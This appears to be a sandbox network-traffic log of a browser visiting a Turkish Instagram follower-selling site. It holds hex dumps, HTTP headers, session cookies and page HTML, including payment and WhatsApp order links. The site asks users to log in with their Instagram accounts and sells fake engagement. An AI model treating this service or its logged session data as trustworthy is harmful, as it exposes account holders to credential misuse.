                    Data Ascii: ; transition: all 0.4s ease 0s; box-shadow: rgba(0, 0, 0, 0.4) 1px 1px 4px; margin-bottom: 0px; touch-action: manipulation; cursor: pointer; background-image: none; white-space: nowrap; background-size: 200%; background-position: 50% center; text-transfor
                    2024-05-26 22:58:35 UTC1369INData Raw: 68 6f 70 69 65 72 2e 63 6f 6d 2f 33 35 33 32 36 39 34 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 34 35 35 2c 20 31 30 35 2c 20 30 35 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30
                    Data Ascii: hopier.com/3532694" style="background-color: rgb(455, 105, 05); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; font-size: 10px; line-height: 1.846; border-radius: 10px; transition: all 0.4s ease 0s; box-shadow: rgba(0
                    2024-05-26 22:58:35 UTC1369INData Raw: 70 6f 69 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 32 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 35 30 25 20 63 65 6e 74 65 72 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 48 41 56 41 4c 45 2f 45 46 54 20 c4 b0 4c 45 20 53 41 54 49 4e 20 41 4c 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 69 65 72 2e 63 6f 6d 2f 33 35 33 34 35 34 39 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f
                    Data Ascii: pointer; background-image: none; white-space: nowrap; background-size: 200%; background-position: 50% center; text-transform: uppercase;" target="_blank">HAVALE/EFT LE SATIN AL</a><a class="btn btn-info" href="https://shopier.com/3534549" style="backgro
                    2024-05-26 22:58:35 UTC1369INData Raw: 72 67 62 28 37 36 2c 20 31 37 35 2c 20 38 30 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 20 31 70 78 20 31 70 78 20 34 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6d 61 6e
                    Data Ascii: rgb(76, 175, 80); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; line-height: 1.846; border-radius: 10px; transition: all 0.4s ease 0s; box-shadow: rgba(0, 0, 0, 0.4) 1px 1px 4px; margin-bottom: 0px; touch-action: man
                    2024-05-26 22:58:35 UTC1369INData Raw: 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 20 62 74 6e 2d 6c 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 33 34 33 33 33 34 38 35 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 37 36 2c 20 31 37 35 2c 20 38 30 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73
                    Data Ascii: </div><a class="btn btn-info btn-lg" href="https://api.whatsapp.com/send?phone=905434333485" style="background-color: rgb(76, 175, 80); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; line-height: 1.846; border-radius
                    2024-05-26 22:58:35 UTC1369INData Raw: 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 63 6b 61 67 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 6d 65 22 3e 31 2e 30 30 30 20 49 4e 53 54 41 47 52 41 4d 20 42 45 c4 9e 45 4e c4 b0 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 63 65 22 3e 0a 3c 70 3e 3c 73 3e 31 34 30 2e 30 30 20 54 4c 3c 2f 73 3e 26 6e 62 73 70 3b 37 30 2e 30 30 20 54 4c 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 20 62 74 6e 2d 6c 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 33 34 33 33 33 34 38 35 22 20 73 74 79 6c 65
                    Data Ascii: iv><div class="col-md-4"><div class="package"><div class="name">1.000 INSTAGRAM BEEN</div><div class="price"><p><s>140.00 TL</s>&nbsp;70.00 TL</p></div><a class="btn btn-info btn-lg" href="https://api.whatsapp.com/send?phone=905434333485" style


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    87192.168.2.54986735.190.80.14433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC477OUTPOST /report/v4?s=l9Q2NhKNcmiYuawVkY6%2FFZHGWCkucLEvghjiYGr2K4LS7VB500g%2BPV379t7kj5WUbcYjeBh%2F4F7R3lnu9nfXimYuu4rldEgbjiqW4eUgvo%2FJj3E3uMakhtru3ioehm8%3D HTTP/1.1
                    Host: a.nel.cloudflare.com
                    Connection: keep-alive
                    Content-Length: 3847
                    Content-Type: application/reports+json
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:35 UTC3847OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 35 35 30 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 37 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6e 61 74 61 6b 69 70 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 37 2e 38 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a
                    Data Ascii: [{"age":55503,"body":{"elapsed_time":3709,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://anatakip.com/","sampling_fraction":1.0,"server_ip":"104.21.27.83","status_code":404,"type":"http.error"},"type":"network-error","url":
                    2024-05-26 22:58:35 UTC168INHTTP/1.1 200 OK
                    content-length: 0
                    date: Sun, 26 May 2024 22:58:35 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    88192.168.2.549869104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC804OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/tools/send-follower
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
                    2024-05-26 22:58:35 UTC744INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TpFaT6KH7QmA%2BzZk1U61OeBEF7mtOqccNtX%2Bi0TeJmm%2BeiVlqcOc8%2FjvX8f9A78s0CauiVxny7dNF%2FdwcGLSXGVxVx7VXkbzOIQUy7DZHvc04hlIqzz2ozapQfsHAdc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15eeb286bc41b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:35 UTC625INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:35 UTC1369INData Raw: 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72
                    Data Ascii: ets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getir
                    2024-05-26 22:58:35 UTC1369INData Raw: 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e
                    Data Ascii: r-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="n
                    2024-05-26 22:58:35 UTC1369INData Raw: 3e 0a 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61
                    Data Ascii: ><h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div cla
                    2024-05-26 22:58:35 UTC1369INData Raw: 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b
                    Data Ascii: ript><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[
                    2024-05-26 22:58:35 UTC1193INData Raw: 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77
                    Data Ascii: color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow
                    2024-05-26 22:58:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    89192.168.2.549870104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:35 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1431.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15eeb3c3e421b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    90192.168.2.549871104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:35 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/55.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15eeb7b24182d-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    91192.168.2.549873104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC795OUTGET /ajax/keep-session HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    Accept: application/json, text/javascript, */*; q=0.01
                    X-Requested-With: XMLHttpRequest
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
                    2024-05-26 22:58:36 UTC699INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:36 GMT
                    Content-Type: application/json
                    Content-Length: 38
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XtZHLh6z7XaB8%2FpB6pb%2B3JN9XDrwzOG7OegRvOgXMduIL6s2gpseimdym9f%2BuLzecilyzQTugGPXQw2LLtBfIiUyHCD1kYeDsAn4%2FhWjWTWfSXOz0hWPbluj3GxY%2Fg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15eef4a664204-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:36 UTC38INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 6e 6f 6e 52 65 61 64 54 68 72 65 61 64 43 6f 75 6e 74 22 3a 30 7d
                    Data Ascii: {"status":"ok","nonReadThreadCount":0}


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    92192.168.2.549874104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:35 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:36 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/13/1398.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15eef99348cb7-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:36 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    93192.168.2.549875104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:36 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:36 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
